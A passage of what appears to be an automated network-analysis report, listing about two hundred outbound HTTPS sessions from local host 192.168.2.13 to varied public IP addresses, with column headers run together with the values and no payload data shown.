                                                  19413192.168.2.1340974166.37.186.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19414192.168.2.1358824172.193.176.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19415192.168.2.133877263.46.152.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19416192.168.2.1337172210.149.10.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19417192.168.2.135011662.18.30.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19418192.168.2.1357628113.30.128.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19419192.168.2.1351224182.93.20.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19420192.168.2.134869638.191.142.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19421192.168.2.1358172150.198.25.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19422192.168.2.1333928169.72.189.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19423192.168.2.135297870.140.185.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19424192.168.2.1335556189.232.94.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19425192.168.2.133337837.229.66.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19426192.168.2.134848895.246.69.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19427192.168.2.1353444188.104.25.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19428192.168.2.1338422145.105.206.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19429192.168.2.1350798210.73.221.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19430192.168.2.135756671.18.244.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19431192.168.2.133866654.123.241.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19432192.168.2.1349982211.152.28.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19433192.168.2.1339198150.83.178.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19434192.168.2.135867293.183.204.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19435192.168.2.135544867.136.88.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19436192.168.2.133802251.248.128.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19437192.168.2.133987254.49.5.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19438192.168.2.134018481.95.93.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19439192.168.2.1359096144.214.196.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19440192.168.2.133693214.137.64.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19441192.168.2.1337552195.12.206.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19442192.168.2.133312232.159.234.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19443192.168.2.135392414.159.121.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19444192.168.2.1338194146.33.180.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19445192.168.2.1339222144.63.168.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19446192.168.2.133726442.8.223.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19447192.168.2.135829452.62.50.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19448192.168.2.1334286156.198.200.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19449192.168.2.133496688.37.249.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19450192.168.2.135390027.201.248.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19451192.168.2.1338956209.246.122.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19452192.168.2.13603008.96.57.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19453192.168.2.1333932125.188.200.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19454192.168.2.1359604164.101.65.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19455192.168.2.1342788153.39.135.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19456192.168.2.1360668203.116.8.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19457192.168.2.1351600105.41.56.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19458192.168.2.135528412.149.236.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19459192.168.2.1337310177.33.231.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19460192.168.2.1332824157.213.243.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19461192.168.2.1333360221.90.113.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19462192.168.2.1356770221.58.250.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19463192.168.2.133889014.157.45.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19464192.168.2.135680867.94.255.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19465192.168.2.1349516125.162.69.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19466192.168.2.135192247.192.80.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19467192.168.2.1360276106.215.191.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19468192.168.2.134798278.122.143.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19469192.168.2.133710497.194.234.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19470192.168.2.1350182193.74.47.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19471192.168.2.1334190105.45.184.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19472192.168.2.1335928104.91.231.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19473192.168.2.1342688122.10.177.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19474192.168.2.1355256143.52.59.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19475192.168.2.1348358193.11.214.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19476192.168.2.133830265.217.24.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19477192.168.2.133711047.99.200.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19478192.168.2.1342654134.180.233.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19479192.168.2.134392886.227.52.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19480192.168.2.1356598112.109.223.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19481192.168.2.1348630196.13.64.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19482192.168.2.135353090.89.233.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19483192.168.2.135060825.233.30.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19484192.168.2.13523429.64.180.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19485192.168.2.1337804109.62.141.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19486192.168.2.1348112187.203.117.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19487192.168.2.1333352152.253.45.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19488192.168.2.1345482184.144.241.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19489192.168.2.1349556192.56.114.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19490192.168.2.1347362208.239.81.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19491192.168.2.1356920220.217.246.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19492192.168.2.1356002207.207.68.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19493192.168.2.134794048.7.72.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19494192.168.2.135594078.73.39.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19495192.168.2.1359210204.49.238.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19496192.168.2.135463050.5.87.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19497192.168.2.134230482.174.228.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19498192.168.2.134733850.209.244.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19499192.168.2.134788246.121.67.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19500192.168.2.1356814101.145.11.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19501192.168.2.133371627.86.79.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19502192.168.2.133534066.62.0.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19503192.168.2.1342676146.123.114.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19504192.168.2.1354372178.69.169.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19505192.168.2.136058288.51.139.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19506192.168.2.135610064.120.69.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19507192.168.2.1360084221.119.24.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19508192.168.2.1346870212.3.252.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19509192.168.2.134234258.161.192.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19510192.168.2.1355808164.155.69.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19511192.168.2.134332067.252.36.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19512192.168.2.1348404148.80.67.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19513192.168.2.134159470.196.196.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19514192.168.2.1342066150.161.244.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19515192.168.2.134100885.59.222.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19516192.168.2.1348738218.166.199.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19517192.168.2.1333992183.75.76.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19518192.168.2.134779657.71.147.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19519192.168.2.135421451.1.14.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19520192.168.2.133573690.179.183.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19521192.168.2.1360008174.165.25.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19522192.168.2.134859075.140.171.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19523192.168.2.1358426192.245.41.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19524192.168.2.1360548216.228.183.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19525192.168.2.1337532135.137.188.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19526192.168.2.133594299.106.182.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19527192.168.2.135861843.41.11.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19528192.168.2.134789054.139.19.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19529192.168.2.1338136169.112.170.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19530192.168.2.1347408199.8.207.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19531192.168.2.1351108129.178.190.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19532192.168.2.135324663.158.211.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19533192.168.2.135646898.71.110.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19534192.168.2.1332882101.158.120.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19535192.168.2.134772072.89.175.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19536192.168.2.135217624.28.160.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19537192.168.2.135984643.167.158.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19538192.168.2.1346630179.151.197.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19539192.168.2.1353638175.87.38.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19540192.168.2.1359092136.27.147.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19541192.168.2.1359514218.194.15.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19542192.168.2.135018058.44.157.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19543192.168.2.1354478170.1.113.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19544192.168.2.135413457.40.11.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19545192.168.2.1341078154.243.198.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19546192.168.2.1353368118.124.217.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19547192.168.2.135456413.162.161.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19548192.168.2.135160276.96.118.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19549192.168.2.1333018104.81.82.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19550192.168.2.1344182176.213.79.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19551192.168.2.1358404110.170.117.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19552192.168.2.1350404102.237.151.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19553192.168.2.134007674.115.22.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19554192.168.2.1341068210.252.57.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19555192.168.2.134129234.224.225.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19556192.168.2.1356412169.0.69.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19557192.168.2.1354204196.208.3.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19558192.168.2.1358840220.82.220.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19559192.168.2.135591673.137.200.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19560192.168.2.133768848.109.103.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19561192.168.2.1351510157.199.165.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19562192.168.2.1347652132.156.47.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19563192.168.2.1359932104.255.47.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19564192.168.2.1344218212.131.50.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19565192.168.2.1345936152.118.58.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19566192.168.2.135328844.135.127.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19567192.168.2.1349530159.135.45.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19568192.168.2.133637461.39.2.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19569192.168.2.134996235.80.27.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19570192.168.2.134773069.38.172.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19571192.168.2.1350876195.231.13.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19572192.168.2.1348090170.194.195.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19573192.168.2.1345636196.1.73.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19574192.168.2.135923282.69.130.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19575192.168.2.1334436210.221.174.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19576192.168.2.136056631.41.123.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19577192.168.2.133374071.164.91.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19578192.168.2.135013474.149.180.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19579192.168.2.134954689.62.204.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19580192.168.2.134747251.80.6.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19581192.168.2.1355540186.116.190.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19582192.168.2.1352364147.196.67.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19583192.168.2.135415865.34.24.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19584192.168.2.1341042201.218.36.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19585192.168.2.1336580166.65.71.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19586192.168.2.1345578164.158.130.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19587192.168.2.133911844.125.195.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19588192.168.2.133589443.53.92.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19589192.168.2.1342462148.95.229.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19590192.168.2.1351392125.13.43.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19591192.168.2.1351012160.2.59.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19592192.168.2.1354664217.98.179.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19593192.168.2.135040092.15.216.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19594192.168.2.1339714148.240.96.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19595192.168.2.1350682221.106.24.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19596192.168.2.1356802131.255.68.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19597192.168.2.133829058.227.59.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19598192.168.2.13575484.242.172.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19599192.168.2.133944017.1.156.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19600192.168.2.13435828.73.158.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19601192.168.2.135589413.52.116.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19602192.168.2.1337330200.37.23.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19603192.168.2.134732651.68.30.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19604192.168.2.1336768140.4.224.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19605192.168.2.133931817.202.202.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19606192.168.2.133637666.63.112.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19607192.168.2.1342806124.181.214.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19608192.168.2.1342072176.157.138.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19609192.168.2.1339632186.80.24.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19610192.168.2.134061434.54.200.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19611192.168.2.1355332180.125.50.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19612192.168.2.135731091.45.137.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19613192.168.2.133485219.115.108.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19614192.168.2.133277243.15.125.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19615192.168.2.133339438.223.81.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19616192.168.2.1337770114.205.7.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19617192.168.2.13507505.116.151.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19618192.168.2.134351441.37.113.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19619192.168.2.1359622143.239.174.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19620192.168.2.1342344105.191.3.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19621192.168.2.1338958184.8.190.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19622192.168.2.1337988182.69.248.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19623192.168.2.1333900133.143.142.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19624192.168.2.134998490.214.9.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19625192.168.2.1352056182.21.129.53443
                                                  TimestampBytes transferredDirectionData


